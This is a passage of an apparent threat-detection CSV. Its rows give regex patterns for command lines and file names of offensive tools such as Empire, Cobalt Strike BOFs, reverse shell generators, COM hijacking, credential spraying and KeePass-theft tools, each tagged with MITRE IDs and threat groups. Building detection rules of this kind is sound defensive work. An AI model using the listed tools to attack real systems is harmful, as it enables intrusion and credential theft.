-pe-exp-list *.dll*",".{0,1000}\s\-pe\-exp\-list\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "* -PEPath * -ExeArgs *",".{0,1000}\s\-PEPath\s.{0,1000}\s\-ExeArgs\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* Perform S4U constrained delegation abuse*",".{0,1000}\sPerform\sS4U\sconstrained\sdelegation\sabuse.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "* perl-reverse-shell - *",".{0,1000}\sperl\-reverse\-shell\s\-\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* -PermanentWMI *",".{0,1000}\s\-PermanentWMI\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* Persist General *.dll*",".{0,1000}\sPersist\sGeneral\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "* Persist Tasksch *.dll*",".{0,1000}\sPersist\sTasksch\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - 
TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "* Persist TreatAs *.dll*",".{0,1000}\sPersist\sTreatAs\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "* persist_hkcu_run*",".{0,1000}\spersist_hkcu_run.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* Persistence.sh*",".{0,1000}\sPersistence\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "* -PersistenceScriptName *",".{0,1000}\s\-PersistenceScriptName\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -PersistentScriptFilePath *",".{0,1000}\s\-PersistentScriptFilePath\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* PetitPotato.cpp*",".{0,1000}\sPetitPotato\.cpp.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "* PEzor.sh *",".{0,1000}\sPEzor\.sh\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* PEzor.sh 
*",".{0,1000}\sPEzor\.sh\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -pfx *.pfx -dc-ip *",".{0,1000}\s\-pfx\s.{0,1000}\.pfx\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* pgsql-brute.nse*",".{0,1000}\spgsql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* PhishCreds.ps1*",".{0,1000}\sPhishCreds\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* -pi \\\\\\\\.\\\\pipe\\\\*",".{0,1000}\s\-pi\s\\\\\\\\\\\\\\\\\.\\\\\\\\pipe\\\\\\\\.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* Pictures\Screenshots\loot.zip*",".{0,1000}\sPictures\\Screenshots\\loot\.zip.{0,1000}","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. 
Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "* --pid * --disable --privilege SeDebugPrivilege*",".{0,1000}\s\-\-pid\s.{0,1000}\s\-\-disable\s\-\-privilege\sSeDebugPrivilege.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*----------------------- Pillage Modules -----------------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sPillage\sModules\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* PingSweep.ps1*",".{0,1000}\sPingSweep\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* --pinject *",".{0,1000}\s\-\-pinject\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* -PipeName * -ServiceName * -Command whoami*",".{0,1000}\s\-PipeName\s.{0,1000}\s\-ServiceName\s.{0,1000}\s\-Command\swhoami.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","29","9","2024-05-01T13:42:06Z","2023-09-06T16:00:47Z" "* pipename_stager *",".{0,1000}\spipename_stager\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "* -pipename_stager *",".{0,1000}\s\-pipename_stager\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* pjl-info-config.nse*",".{0,1000}\spjl\-info\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","7","620","61","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" "* pjl-ready-message.nse*",".{0,1000}\spjl\-ready\-message\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --plugin gmailenum*",".{0,1000}\s\-\-plugin\sgmailenum.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* --plugin httpbrute*",".{0,1000}\s\-\-plugin\shttpbrute.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* --plugin KeeFarceRebornPlugin.dll*",".{0,1000}\s\-\-plugin\sKeeFarceRebornPlugin\.dll.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --plugin KeeFarceRebornPlugin.dll*",".{0,1000}\s\-\-plugin\sKeeFarceRebornPlugin\.dll.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "* --plugin o365enum*",".{0,1000}\s\-\-plugin\so365enum.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* polenum.py*",".{0,1000}\spolenum\.py.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "* PoolParty.cpp*",".{0,1000}\sPoolParty\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "* PoolParty.exe*",".{0,1000}\sPoolParty\.exe.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "* pop3-brute.nse*",".{0,1000}\spop3\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* pop3-capabilities.nse*",".{0,1000}\spop3\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* pop3-ntlm-info.nse*",".{0,1000}\spop3\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* popcalc.bin *",".{0,1000}\spopcalc\.bin\s.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation 